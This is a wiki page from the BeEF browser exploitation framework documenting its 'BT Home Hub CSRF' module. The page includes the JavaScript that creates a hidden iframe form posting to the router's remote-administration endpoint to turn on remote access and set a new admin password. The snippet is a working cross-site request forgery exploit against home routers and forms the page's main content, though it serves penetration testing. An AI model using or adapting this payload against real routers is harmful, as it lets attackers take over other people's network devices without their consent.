-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: BT Home Hub CSRF
Haoxi Tan edited this page Jan 9, 2020
·
2 revisions
-
Objective: enable remote administration and change the password on a BT Home Hub wireless router.
-
Authors: bcoles
-
Browsers: All
Creates iframes with POST requests to enable remote administration and change the password on a BT Home Hub wireless router.
var bt_home_hub_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST", "application/x-www-form-urlencoded", [
{'type':'hidden', 'name':'0', 'value':'31'} ,
{'type':'hidden', 'name':'1', 'value':''},
{'type':'hidden', 'name':'30', 'value':passwd}
]);
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK